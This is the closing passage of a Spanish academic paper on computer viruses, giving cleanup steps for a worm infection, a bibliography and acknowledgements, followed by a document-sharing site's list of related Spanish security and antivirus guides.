17 MMC.EXE LOAD.EXE RICHED20.DLL ADMIN.DLL WININIT.INI y borra todos los archivos de los directorios temporales: \Temp\ \Windows\Temp\ \Documents and Settings\%Username%\Local Settings\Temp Ahora reinicia. Borra los *.eml, *.nws infectados Borra el código JavaScript añadido al final de los HTM, HTML, ASP. Desactiva la cuenta "Guest" (invitado) y quítale los permisos de administrador. Comprueba los permisos de los recursos compartidos. Actualiza tu PC con los parches adecuados. BIBLIOGRAFIA Y AGRADECIMIENTOS Kriptópolis: Portal de seguridad y divulgación. The Wild List Organitation International: Organización de alerta sobre virus CyruxNET: Portal de información sobre fallos informáticos. guninski: Pagina de guninski.cazador de bugs. securityfocus: Portal sobre seguridad. Microsoft: Sin comentarios. Pandasoftware: Idem Slipstick Systems: Empresa de software de antivirus. hacksoft: Empresa peruana de antivirus. CERT: Centro de seguridad en internet GFI: Empresa de software de seguridad cknown: Idem. Mis agradecimientos a: Carlos Perez por guiarme entre la inmensa información, Antonio Valls Obrer por su interés y sus busquedas de última hora, Pablo Lemos Ochando y Francisco Garcia Montaner por su ayuda y consejos.

18

19

20

UNIVERSIDAD DE VALENCIA ESCUELA UNIVERSITARIA ESTUDIOS EMPRESARIALES DEPARTAMENTO DE DIRECCIÓN DE EMPRESAS

UNIVERSIDAD DE VALENCIA ESCUELA UNIVERSITARIA ESTUDIOS EMPRESARIALES DEPARTAMENTO DE DIRECCIÓN DE EMPRESAS UNIVERSIDAD DE VALENCIA ESCUELA UNIVERSITARIA ESTUDIOS EMPRESARIALES DE DEPARTAMENTO DE DIRECCIÓN DE EMPRESAS INFORMÀTICA APLICADA A LA GESTIÓN DE EMPRESAS Curso 1998-99 VIRUS INFORMÁTICOS Virus: El primer

Más detalles

Tema 17. Algunos aspectos de seguridad informática

Tema 17. Algunos aspectos de seguridad informática Tema 17. Algunos aspectos de seguridad informática Virus y otro malware Cortafuegos Criptografía Recomendaciones de seguridad generales Virus y otro malware Malware Virus Troyanos Keyloggers Programas

Más detalles

LA IMPORTANCIA DE LOS ANTIVIRUS

LA IMPORTANCIA DE LOS ANTIVIRUS LA IMPORTANCIA DE LOS ANTIVIRUS QUÉ ES UN VIRUS?: Son programas que se introducen en nuestros ordenadores de formas muy diversas. Este tipo de programas son especiales ya que pueden producir efectos no

Más detalles

MEDIDAS DE PREVENCION CONTRA VIRUS

MEDIDAS DE PREVENCION CONTRA VIRUS MEDIDAS DE PREVENCION CONTRA VIRUS La seguridad consiste en asegurar que los recursos del sistema informático (información, programas) de una organización sean utilizados de la manera que se decidió y

Más detalles

Algunos Conceptos. Clasificación de los virus informáticos:

Algunos Conceptos. Clasificación de los virus informáticos: Algunos Conceptos Caballos de Troya Programas que parecen de utilidad y que llevan o transportan rutinas que al activarse causan daños. No se reproducen a si mismos. Nombrados así por analogía con el caballo

Más detalles

Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez. UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P. Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30

Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez. UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P. Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30 Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30 Posibles ataques a un sistema Posibles ataques a un sistema

Más detalles

CAPACITACIÓN EN MANEJO DE ANTIVIRUS

CAPACITACIÓN EN MANEJO DE ANTIVIRUS Universidad del Cauca CAPACITACIÓN EN MANEJO DE ANTIVIRUS Autor: Andrea Pacheco División de Sistemas - División de Recursos Humanos 2007 Contenido 1. -virus... 3 1.1. -Virus y sus efectos sobre nuestro

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

AGREGAR COMPONENTES ADICIONALES DE WINDOWS

AGREGAR COMPONENTES ADICIONALES DE WINDOWS INSTALACIÓN DE IIS EN WINDOWS XP El sistema está desarrollado para ejecutarse bajo la plataforma IIS de Windows XP. Por esta razón, incluimos la instalación de IIS (Servidor de Web) para la correcta ejecución

Más detalles

Fases de Instalación de un Sistema Operativo

Fases de Instalación de un Sistema Operativo Fases de Instalación de un Sistema Operativo 1. Preparar el equipo para arrancar desde CD/DVD. 2. Preparación del Disco Duro: 3. Ejecutar el programa de instalación 4. Proporcionar el nombre y contraseña

Más detalles

Lo más habitual es que los virus permanezcan ocultos en archivos del tipo ejecutable (.exe y.com), pero pueden existir en otros formatos.

Lo más habitual es que los virus permanezcan ocultos en archivos del tipo ejecutable (.exe y.com), pero pueden existir en otros formatos. En informática, pequeño software que, al igual que un virus biológico, infecta a una computadora y se propaga en ella con diversos propósitos como daño, robo de información, molestia, etc. y por lo general

Más detalles

S eguridad Informática

S eguridad Informática 1- D efinición de Virus 2 - R eproducción de los Virus 3 - Tipos de Virus 4 - Los daños que causan 5 - Formas de contagio 6 Otros Malware 6 Antivirus y Firewall 7 - Medidas de Prevención 1- D efinición

Más detalles

Documentación sistema de Backups

Documentación sistema de Backups Documentación sistema de Backups En esta documentación se indicará detalladamente los pasos a seguir y los procesos utilizados para realizar copias de seguridad de los distintos archivos de un servidor

Más detalles

Protegernos de los Virus

Protegernos de los Virus Protegernos de los Virus Qué es un Virus? Los virus de ordenador son programas que se reproducen o propagan a si mismos (estos últimos se llaman gusanos o "worms"), y suelen usarse para destruir, manipular

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

VIRUS INFORMÁTICO. Nombre: Francisco Lara. Juan Vivanco. Profesor: Rodrigo Tapia

VIRUS INFORMÁTICO. Nombre: Francisco Lara. Juan Vivanco. Profesor: Rodrigo Tapia VIRUS INFORMÁTICO Nombre: Francisco Lara Juan Vivanco Profesor: Rodrigo Tapia Índice: CONTENIDO 1.- Origen:... 3 2.- Definición:... 4 3.- Técnicas de programación y tipos de daños ocasionados:... 5 4.-

Más detalles

MANUAL DE USUARIO. Funcionalidad de Asistente PC de Movistar GUÍA BÁSICA DE MANEJO

MANUAL DE USUARIO. Funcionalidad de Asistente PC de Movistar GUÍA BÁSICA DE MANEJO MANUAL DE USUARIO Funcionalidad de Asistente PC de Movistar GUÍA BÁSICA DE MANEJO Índice Índice... 2 1 Introducción a Asistente PC de Movistar... 3 2 Funcionalidad recogida en Asistente PC de Movistar...

Más detalles

Internet Information Server

Internet Information Server Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en

Más detalles

Ofimática Aplicada UNIDAD I : FUNDAMENTOS DEL ORDENADOR

Ofimática Aplicada UNIDAD I : FUNDAMENTOS DEL ORDENADOR Ofimática Aplicada UNIDAD I : FUNDAMENTOS DEL ORDENADOR Contenido: Arquitectura de un Pc Herramientas de Seguridad Herramientas Utilitarios Elaborado por: Lic. Ronald Méndez Arquitectura de un Pc Es el

Más detalles

MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DE CLOUD BACKUP

MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DE CLOUD BACKUP MANUAL DE INSTALACIÓN Y CONFIGURACIÓN DE CLOUD BACKUP INDICE 1.- Descarga del Software 2.- Instalación del Software 3.- Configuración del software y de la copia de seguridad 3.1.- Configuración inicial

Más detalles

Documentación Instalación NOD32 Server y Clientes

Documentación Instalación NOD32 Server y Clientes Documentación Instalación NOD32 Server y Clientes En esta documentación se indicará detalladamente la manera de instalar el antivirus NOD32 de forma distribuida desde un servidor de dominio a todos los

Más detalles

VIRUS. Un virus informático es un programa de computadora, cuyo autor generalmente prefiere guardar el anonimato y que se caracterisa porque:

VIRUS. Un virus informático es un programa de computadora, cuyo autor generalmente prefiere guardar el anonimato y que se caracterisa porque: VIRUS En los últimos años ha aparecido en los medios de comunicación un verdadero alud de información sobre el fenómeno de virus informáticos, que ha creado un ambiente de cierta confusión. Por otra parte,

Más detalles

Lección 5: Bloc de notas Estudio de la aplicación Bloc de notas, utilizada para escribir sencillos documentos de texto de tamaño reducido.

Lección 5: Bloc de notas Estudio de la aplicación Bloc de notas, utilizada para escribir sencillos documentos de texto de tamaño reducido. Curso para conocer y aprender a manejar completamente el sistema operativo Microsoft Windows XP Professional, analizando desde el entorno del mismo hasta sus herramientas administrativas más complejas

Más detalles

Poder Judicial de Tucumán Año 2013

Poder Judicial de Tucumán Año 2013 Internet y Correo electrónico El presente instructivo corresponde a una guía básica para el manejo de los programas y para la adquisición de conceptos en relación a estos utilitarios. No obstante ello,

Más detalles

Hostaliawhitepapers. Qué amenazas nos podemos encontrar por la red

Hostaliawhitepapers. Qué amenazas nos podemos encontrar por la red Qué amenazas nos podemos encontrar por la red Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Todo el mundo que utiliza algún equipo informático ha escuchado alguna vez

Más detalles

ESPOCH - FACULTAD CIENCIAS BOLETÍN TÉCNICO INFORMÁTICO 02 22 de diciembre del 2008

ESPOCH - FACULTAD CIENCIAS BOLETÍN TÉCNICO INFORMÁTICO 02 22 de diciembre del 2008 VIRUS.... 1 INSTALACIÓN DE ANTIVIRUS... 2 ACTUALIZACIÓN SIN INTERNET.... 5 VIRUS. Al comportamiento extraño de nuestras PC, acostumbramos a decir que estamos infectados; y desde luego que algún tipo de

Más detalles

Compartir Biblio en una red local con Windows XP

Compartir Biblio en una red local con Windows XP Compartir Biblio en una red local con Windows XP Caso práctico Supongamos que tenemos 2 tipos de personas que van a necesitar acceder remotamente (a través de otro ordenador de la red local) a la base

Más detalles

Respaldo en Línea Movistar

Respaldo en Línea Movistar Respaldo en Línea Movistar Contenido Capítulo 1: Ayuda de en línea Respaldo en Línea Movistar...3 Qué es Respaldo en Línea (Backup) Movistar...3 Cómo funciona el programa?...4 Capítulo 2: Instalación...5

Más detalles

Introducción a las Computadoras * Virus en las Computadoras * Prof. Ángel Torres

Introducción a las Computadoras * Virus en las Computadoras * Prof. Ángel Torres Introducción a las Computadoras * Virus en las Computadoras * Prof. Ángel Torres DEFINICIÓN DE VIRUS QUÉ SON LOS VIRUS? Los virus son programas que fueron desarrollados para que se introduzcan en nuestra

Más detalles

Seguridad Informática ANTIVIRUS. Antivirus

Seguridad Informática ANTIVIRUS. Antivirus Seguridad Informática ANTIVIRUS Antivirus Que es un Antivirus??? Un antivirus es un programa informático específicamente diseñado para detectar bloquear y eliminar virus, utilizan diferentes técnicas para

Más detalles

Soporte al. hardware

Soporte al. hardware REVISE CAPÍTULO 5 Ayuda de solución de problemas de hardware La solución de problemas de componentes es un proceso de eliminación. Debe usted eliminar metódicamente las causas posibles del problema. La

Más detalles

Pág 1. Manual del usuario NETRETINA EVO. Helpdesk Software

Pág 1. Manual del usuario NETRETINA EVO. Helpdesk Software Pág 1 NETRETINA EVO Helpdesk Software Pág 2 NeTRetina EVO Índice de contenido 1. Información general del software 2. Requerimientos 3. Instalación y puesta en marcha 4. Módulos del software a. Servidor

Más detalles

Sophos Control Center Ayuda

Sophos Control Center Ayuda Sophos Control Center Ayuda Versión: 4.1 Edición: marzo de 2010 Contenido 1 Acerca de Sophos Control Center...3 2 Introducción a Sophos Control Center...4 3 Comprobar que la red se encuentra protegida...8

Más detalles

1. LA PROTECCIÓN DE NUESTRA INTIMIDAD: ALGUNOS CONSEJOS TÉCNICOS.

1. LA PROTECCIÓN DE NUESTRA INTIMIDAD: ALGUNOS CONSEJOS TÉCNICOS. 1. LA PROTECCIÓN DE NUESTRA INTIMIDAD: ALGUNOS CONSEJOS TÉCNICOS. En definitiva las cookies, son herramientas empleada por los servidores Web para almacenar y recuperar información acerca de sus visitantes.

Más detalles

Guía de usuario del Microsoft Apps for Symbian

Guía de usuario del Microsoft Apps for Symbian Guía de usuario del Microsoft Apps for Symbian Edición 1.0 2 Acerca de Microsoft Apps Acerca de Microsoft Apps Microsoft Apps proporciona aplicaciones empresariales de Microsoft a su teléfono Nokia Belle,

Más detalles

PROTECCIoN USB: javier.esparza@seguridadticmelilla.es seguridadticmelilla.es

PROTECCIoN USB: javier.esparza@seguridadticmelilla.es seguridadticmelilla.es PROTECCIoN USB:, Hoy en día los virus han mutado hacia nuevas formas, y vías de contaminación. Técnicamente son peores, y utilizan lenguajes de programación de más alto nivel, por lo que se necesitan menos

Más detalles

Manual de usuario. Sophos Anti-Virus para Mac OS X, versión 4.8. Para usuarios de red e independientes con Mac OS X 10.

Manual de usuario. Sophos Anti-Virus para Mac OS X, versión 4.8. Para usuarios de red e independientes con Mac OS X 10. Manual de usuario Sophos Anti-Virus para Mac OS X, versión 4.8 Para usuarios de red e independientes con Mac OS X 10.2 o posterior Fecha del documento: mayo de 2006 Acerca de este manual En este manual

Más detalles

MANUAL SOBRE SEGURIDAD EN INTERNET

MANUAL SOBRE SEGURIDAD EN INTERNET MANUAL SOBRE SEGURIDAD EN INTERNET VIRUS Los virus informáticos son programas que se propagan ocultos dentro de otro programa, correo electrónico, página web, o fichero, alterando el funcionamiento del

Más detalles

CONCEPTOS BASICOS DE VIRUS INFORMATICOS

CONCEPTOS BASICOS DE VIRUS INFORMATICOS estarás en línea con estas opciones ahora en el icono de abajo parecido a un candelabro dale un click y te mostrara una pantalla donde podrás añadir usuarios. CONCEPTOS BASICOS DE VIRUS INFORMATICOS Qué

Más detalles

Mail Disclaimer Versión 1.7.4

Mail Disclaimer Versión 1.7.4 Mail Disclaimer Versión 1.7.4 Resumen MailDisclaimer para Exchange Servidor nos permite añadir una funcionalidad completa, con la cual seremos capaces de insertar avisos de limitación de responsabilidad

Más detalles

Sincronizar Outlook y archivos entre varios PCs de un único usuario. Guía de Usuario

Sincronizar Outlook y archivos entre varios PCs de un único usuario. Guía de Usuario Sincronizar Outlook y archivos entre varios PCs de un único usuario Guía de Usuario Contenido Introducción a SYNCING.NET... 3 Bienvenido a SYNCING.NET... 3 Utilizando SYNCING.NET... 3 Cómo funciona SYNCING.NET?...

Más detalles

Optimización del sistema. capítulo 09

Optimización del sistema. capítulo 09 Optimización del sistema capítulo 09 Optimización del sistema optimización El sistema operativo es lo más parecido a un gallinero o a una casa con muchos inquilinos: cada cierto tiempo hay que poner orden.

Más detalles

Ejemplo práctico de instalación del programa JCLIC en red

Ejemplo práctico de instalación del programa JCLIC en red Ejemplo práctico de instalación del programa JCLIC en red Una red local permite optimizar los recursos, tanto en relación al espacio (los programas se pueden colocar en el disco duro del servidor y ser

Más detalles

Crear un servidor Web en IIS

Crear un servidor Web en IIS Crear un servidor Web en IIS Qué es un servidor web? Un servidor web es un programa que se ejecuta continuamente en un computador, manteniéndose a la espera de peticiones de ejecución que le hará un cliente

Más detalles

Los virus informáticos

Los virus informáticos SEGURIDAD DE LA INFORMACIÓN Es el estudio de los métodos y medios de protección de los sistemas de información y comunicaciones frente a amenazas de los siguientes tipos: - Sin intervención humana Amenazas

Más detalles

Compartir Outlook y archivos entre múltiples usuarios. (Grupos de trabajo, pequeñas empresas) Guía de Usuario

Compartir Outlook y archivos entre múltiples usuarios. (Grupos de trabajo, pequeñas empresas) Guía de Usuario Compartir Outlook y archivos entre múltiples usuarios (Grupos de trabajo, pequeñas empresas) Guía de Usuario Contenido Introducción a SYNCING.NET... 3 Bienvenido a SYNCING.NET... 3 Utilizando SYNCING.NET...

Más detalles

Windows XP Transferencia de archivos y configuraciones

Windows XP Transferencia de archivos y configuraciones Servicio de Informática Atención al Usuario Windows XP Transferencia de archivos y configuraciones Sección de Atención al Usuario Ultima modificación: 01 de Julio de 2.003 Transferencia de archivos y configuraciones

Más detalles

SEGURIDAD EN INFORMÁTICA

SEGURIDAD EN INFORMÁTICA SEGURIDAD EN INFORMÁTICA LA SEGURIDAD Y SUS IMPLICACIONES Características principales de la seguridad en Internet: Confidencialidad. Sólo deben tener acceso a aquellas personas autorizadas para ello. Autentificación

Más detalles

Edición de Ofertas Excel Manual de Usuario

Edición de Ofertas Excel Manual de Usuario Edición de Ofertas Excel Manual de Usuario Alfonso XI, 6 28014 Madrid F(+34) 91 524 03 96 www.omie.es Ref. MU_OfertasExcel.docx Versión 4.0 Fecha: 2012-11-26 ÍNDICE 1 INTRODUCCIÓN 3 2 CONSIDERACIONES DE

Más detalles

IS23 Mantenimiento de Instalaciones Informáticas Práctica 5. Mantenimiento preventivo (II)

IS23 Mantenimiento de Instalaciones Informáticas Práctica 5. Mantenimiento preventivo (II) IS23 Mantenimiento de Instalaciones Informáticas Práctica 5. Mantenimiento preventivo (II) 1 Objetivos Ingeniería Técnica Informática de Sistemas En la presente sesión se pretende familiarizar al alumno

Más detalles

Herramientas Informáticas para la Documentación Práctica 1. Introducción al navegador Netscape

Herramientas Informáticas para la Documentación Práctica 1. Introducción al navegador Netscape Herramientas Informáticas para la Documentación Práctica 1. Introducción al navegador Netscape Introducción y objetivos De modo muy resumido Internet es una red que interconecta redes de ordenadores. Conectándose

Más detalles

Índice de contenido. Manual de administración de hospedaje para administradores de dominios

Índice de contenido. Manual de administración de hospedaje para administradores de dominios Índice de contenido 1. Webmin...2 1.1 Cambio de idioma y tema...2 2. Otros...3 2.1 Cargas y descargas...3 2.2 Conexión Telnet / SSH...4 2.3 Directorios Web Protegidos...5 2.4 Administrador de archivos...6

Más detalles

RECIBIR Y ENVIAR MENSAJES CON OUTLOOK EXPRESS

RECIBIR Y ENVIAR MENSAJES CON OUTLOOK EXPRESS RECIBIR Y ENVIAR MENSAJES CON OUTLOOK EXPRESS Outlook Express se puede ejecutar de varias formas. Las más inmediatas son hacer doble clic en el icono de Outlook Express situado en el escritorio, hacer

Más detalles

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento Qué es AT-Encrypt nos permitirá dotar de contraseña a cualquier documento o carpeta. Este documento o carpeta sólo será legible por aquel que conozca la contraseña El funcionamiento del cifrado (o encriptación)

Más detalles

SHAREPOINT 2007. Manual de Usuario. Herramienta de colaboración en grupo para CASER RESIDENCIAL

SHAREPOINT 2007. Manual de Usuario. Herramienta de colaboración en grupo para CASER RESIDENCIAL SHAREPOINT 2007 Manual de Usuario Herramienta de colaboración en grupo para CASER RESIDENCIAL Versión 1.0 Julio 2011 INDICE Introducción... 3 Prerrequisitos... 3 Empezamos... 4 Trabajando con Bibliotecas

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for Mail Servers. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

Manual Básico de Helm 4.2 para Usuarios:

Manual Básico de Helm 4.2 para Usuarios: Manual Básico de Helm 4.2 para Usuarios: Ante todo queremos agradecerle por elegir a para trabajar junto a usted. Esperamos que este manual lo ayude a trabajar con comodidad y facilidad. Este manual es

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for File Servers. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

FOROS. Manual de Usuario

FOROS. Manual de Usuario FOROS Manual de Usuario Versión: 1.1 Fecha: Septiembre de 2014 Tabla de Contenidos 1. INTRODUCCIÓN... 4 1.1 Propósito... 4 1.2 Definiciones, acrónimos y abreviaturas... 4 2. ESPECIFICACIONES TÉCNICAS...

Más detalles

Título Manual práctico de usuario Alfresco Share (Colabora) Autor Área de Informática Versión 2.0 Lugar: CITI Fecha: 07/09/2012

Título Manual práctico de usuario Alfresco Share (Colabora) Autor Área de Informática Versión 2.0 Lugar: CITI Fecha: 07/09/2012 Área de Informática C/ Rep. Saharaui, 11510, Puerto Real. Tel.: 956016400. Fax: 956016401 Email: area.informatica@uca.es http://www.uca.es/area/informatica Título Manual práctico de usuario Alfresco Share

Más detalles

TARJETA PROFESIONAL ELECTRÓNICA. FAQs

TARJETA PROFESIONAL ELECTRÓNICA. FAQs TARJETA PROFESIONAL ELECTRÓNICA FAQs 1. UTILIDAD DE LA TPE... 4 1.1. Para qué sirve la tarjeta?... 4 1.2. Qué operaciones puedo realizar con la tarjeta?... 4 2. TRAMITACIÓN DE TPE... 4 2.1. Qué debo hacer

Más detalles

AVG File Server. Manual del usuario. Revisión del documento 2015.08 (22.09.2015)

AVG File Server. Manual del usuario. Revisión del documento 2015.08 (22.09.2015) AVG File Server Manual del usuario Revisión del documento 2015.08 (22.09.2015) C opyright AVG Technologies C Z, s.r.o. Reservados todos los derechos. El resto de marcas comerciales son propiedad de sus

Más detalles

BlackBerry Internet Service. Guía del usuario

BlackBerry Internet Service. Guía del usuario BlackBerry Internet Service Guía del usuario Publicado: 2014-01-08 SWD-20140108170428277 Contenido 1 Introducción...7 Acerca de los planes de servicios de mensajería para BlackBerry Internet Service...7

Más detalles

MANUAL DE ADMINISTRACIÓN BIBLIOWEB ESCUELA 2.0

MANUAL DE ADMINISTRACIÓN BIBLIOWEB ESCUELA 2.0 MANUAL DE ADMINISTRACIÓN BIBLIOWEB ESCUELA 2.0 CONSEJERÍA DE EDUCACIÓN, CULTURA Y DEPORTE Dirección General de Innovación Educativa Y Formación del Profesorado Centro de Gestión Avanzado Fecha: 11/11/13

Más detalles

9243059 Edición 1 ES. Nokia y Nokia Connecting People son marcas comerciales registradas de Nokia Corporation

9243059 Edición 1 ES. Nokia y Nokia Connecting People son marcas comerciales registradas de Nokia Corporation 9243059 Edición 1 ES Nokia y Nokia Connecting People son marcas comerciales registradas de Nokia Corporation Cliente de VPN Guía de usuario 9243059 Edición 1 Copyright 2005 Nokia. Reservados todos los

Más detalles

Tema 1. Gestión de correo y agenda electrónica

Tema 1. Gestión de correo y agenda electrónica Tema 1 Gestión de correo y agenda electrónica 1 Índice Gestión de correo y agenda electrónica 1. El correo electrónico o e-mail 2. Microsoft Outlook 2007 3. Correo electrónico y configuración 3.1. Carpeta

Más detalles

C.C.. MARÍA A INMACULADA CÁDIZ

C.C.. MARÍA A INMACULADA CÁDIZ . WINDOWS XP 1 2.3 CLASIFICACIONES DE LOS SISTEMAS LOS SISTEMAS SE PUEDEN CLASIFICAR: POR EL NÚMERO N DE USUARIOS. MONOUSUARIO: : SÓLO S SOPORTAN UN USUARIO A LA VEZ, INDEPENDIENTEMENTE DE LA MÁQUINA.

Más detalles

COMPARTIENDO UN LIBRO DE TRABAJO EXCEL 2007. Manual de Referencia para usuarios. Salomón Ccance CCANCE WEBSITE

COMPARTIENDO UN LIBRO DE TRABAJO EXCEL 2007. Manual de Referencia para usuarios. Salomón Ccance CCANCE WEBSITE COMPARTIENDO UN LIBRO DE TRABAJO EXCEL 2007 Manual de Referencia para usuarios Salomón Ccance CCANCE WEBSITE COMPARTIENDO UN LIBRO DE TRABAJO Existen muchas formas de compartir, analizar y comunicar información

Más detalles

Soporte al hardware. Al terminar este capítulo usted podrá: Agregar componentes a un sistema informático; Solución de problemas mecánicos

Soporte al hardware. Al terminar este capítulo usted podrá: Agregar componentes a un sistema informático; Solución de problemas mecánicos Capítulo 5 Soporte al hardware Al terminar este capítulo usted podrá: Usar el Administrador de dispositivo para determinar si el hardware está funcionando bien; Establecer la causa probable de un problema

Más detalles

Pack Antivirus McAfee

Pack Antivirus McAfee Manual de Usuario Detalle de toda la suite del para configurar y usar el producto con facilidad. Índice Consola 1 1. Descripción del panel de Control 2 2. Protección Antispyware y Antivirus 3 2.1 Análisis

Más detalles

Pack Seguridad Autónomos Consola de gestión del programa agente

Pack Seguridad Autónomos Consola de gestión del programa agente Manual de Usuario Consola de gestión del programa agente Índice 1 Introducción... 2 2 Acceso al agente instalado... 3 3 La consola de gestión... 4 4 Estado de los componentes instalados... 5 5 Barra de

Más detalles

Software. 1- Mensajes de error 2- Drivers 3- Sistema Operativo 4- Virus 5- Aplicaciones 6- Definición del Monitor. 1- Mensajes de Error

Software. 1- Mensajes de error 2- Drivers 3- Sistema Operativo 4- Virus 5- Aplicaciones 6- Definición del Monitor. 1- Mensajes de Error Software TEMAS 1- Mensajes de error 2- Drivers 3- Sistema Operativo 4- Virus 5- Aplicaciones 6- Definición del Monitor 1- Mensajes de Error Mensaje Recomendación Al prender la computadora dice: Error en

Más detalles

Sophos Enterprise Console Guía avanzada de inicio. En el caso de SEC distribuido:

Sophos Enterprise Console Guía avanzada de inicio. En el caso de SEC distribuido: Sophos Enterprise Console Guía avanzada de inicio En el caso de SEC distribuido: Versión: 5.2 Edición: marzo de 2015 Contenido 1 Acerca de esta guía...4 2 Planificar la instalación...5 2.1 Planificar la

Más detalles

DreamWeaver. CS5 y CS6. Cursosindustriales. Curso de DreamWeaver CS6 1

DreamWeaver. CS5 y CS6. Cursosindustriales. Curso de DreamWeaver CS6 1 DreamWeaver CS5 y CS6 Cursosindustriales. Curso de DreamWeaver CS6 1 DREAMWEAVER CS5. DISEÑO DE PÁGINAS DINÁMICAS. En esta segunda sección de diseño de páginas Web con Dreamweaver CS, vamos a hablar sobre

Más detalles

ESET Mobile Antivirus

ESET Mobile Antivirus ESET Mobile Antivirus Manual de instalación y Guía del usuario we protect your digital worlds ESET Mobile Antivirus Copyright 2009 by ESET, spol. s r. o. ESET Smart Security ha sido desarrollado por ESET,

Más detalles

Tipos de correo electrónico, pop y web. Clientes. Cómo se componen? Destinatarios, asunto, descripción (formas de escribir, firma), adjuntos.

Tipos de correo electrónico, pop y web. Clientes. Cómo se componen? Destinatarios, asunto, descripción (formas de escribir, firma), adjuntos. Colegio Bosque Del Plata Tecnología de la Información y las Comunicaciones UNIDAD 2 Transferencia de información electrónica: Correo electrónico E-mail: garcia.fernando.j@gmail.com Profesor: Fernando J.

Más detalles

Antivirus PC (motor BitDefender) Manual de Usuario

Antivirus PC (motor BitDefender) Manual de Usuario Antivirus PC (motor BitDefender) Manual de Usuario Índice 1. Introducción... 3 2. Qué es Antivirus PC?... 3 a. Eficacia... 3 b. Actualizaciones... 4 3. Requisitos técnicos... 4 a. Conocimientos técnicos...

Más detalles

GUÍA DE AMENAZAS. Las diez amenazas más peligrosas de Internet

GUÍA DE AMENAZAS. Las diez amenazas más peligrosas de Internet GUÍA DE AMENAZAS Botnet Su accionar consiste en formar una red o grupo de computadoras zombis (infectados con malware), que son controlados por el propietario de los bots (atacante). Es decir, toman control

Más detalles

Puedes descargar los archivos de instalación de Windows SteadyState en el Centro de descarga Microsoft.

Puedes descargar los archivos de instalación de Windows SteadyState en el Centro de descarga Microsoft. Windows SteadyState Resumen Windows SteadyState es una utilidad de Microsoft que facilita el trabajo a quienes se encargan de la configuración y mantenimiento de equipos compartidos, de manera que todo

Más detalles

TUTORIAL GOOGLE DOCS

TUTORIAL GOOGLE DOCS TUTORIAL GOOGLE DOCS Las principales ventajas de Google Docs son: Nuestros documentos se almacenan en línea: esto nos permite acceder a ellos desde cualquier ordenador con conexión a internet, y compartirlos

Más detalles

Operación Microsoft Windows XP

Operación Microsoft Windows XP El ambiente de trabajo Descripción del ambiente de trabajo Luego de encendida la computadora, la pantalla se presenta de la forma que lo muestra la figura. El ambiente de trabajo que proporciona el sistema

Más detalles

ASISTENCIA TÉCNICA A LA SEGURIDAD INFORMÁTICA EN PYMES MANUAL MICROSOFT SECURITY ESSENTIALS

ASISTENCIA TÉCNICA A LA SEGURIDAD INFORMÁTICA EN PYMES MANUAL MICROSOFT SECURITY ESSENTIALS ASISTENCIA TÉCNICA A LA SEGURIDAD INFORMÁTICA EN PYMES MANUAL MICROSOFT SECURITY ESSENTIALS Microsoft Security Essentials Qué es? Microsoft Security Essentials tiene la potencia del motor Antimalware de

Más detalles

Gestión Documental ERP

Gestión Documental ERP N. Documento Revisión Nº: 1.0 Fecha: 30/03/11 Introducción 1 Configuración de la Gestión Documental ERP 2 Funcionamiento de la Gestión Documental ERP 6 ÍNDICE Introducción El programa Ahora permite una

Más detalles

ISEC Lab #3. Creación de un CD de rescate antivirus con PE-Builder. Vicente Aguilera Díaz vaguileraisecauditors.com

ISEC Lab #3. Creación de un CD de rescate antivirus con PE-Builder. Vicente Aguilera Díaz vaguilera<arroba>isecauditors.com Creación de un CD de rescate antivirus con PE-Builder Vicente Aguilera Díaz vaguileraisecauditors.com 1 INTRODUCCIÓN 3 2 REQUERIMIENTOS DE PE-BUILDER 4 3 CREACIÓN DEL SO ACTUALIZADO 5 4 CREACIÓN

Más detalles

Sophos Anti-Virus para Mac: Home Edition. Para equipos Mac independientes con Mac OS X

Sophos Anti-Virus para Mac: Home Edition. Para equipos Mac independientes con Mac OS X Sophos Anti-Virus para Mac: Home Edition Para equipos Mac independientes con Mac OS X Versión: 9C Edición: junio de 2013 Contenido 1 Acerca de Sophos Anti-Virus...3 2 Detectar amenazas...5 3 Tratar amenazas...26

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for Exchange. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

Un resumen de la actividad de virus en enero del año 2015

Un resumen de la actividad de virus en enero del año 2015 Un A resumen partir del año 1992 de la actividad de virus en enero 1 Un resumen de la actividad de virus en enero 2 2 de febrero de 2015 Según los datos de los especialistas de la empresa Doctor Web, el

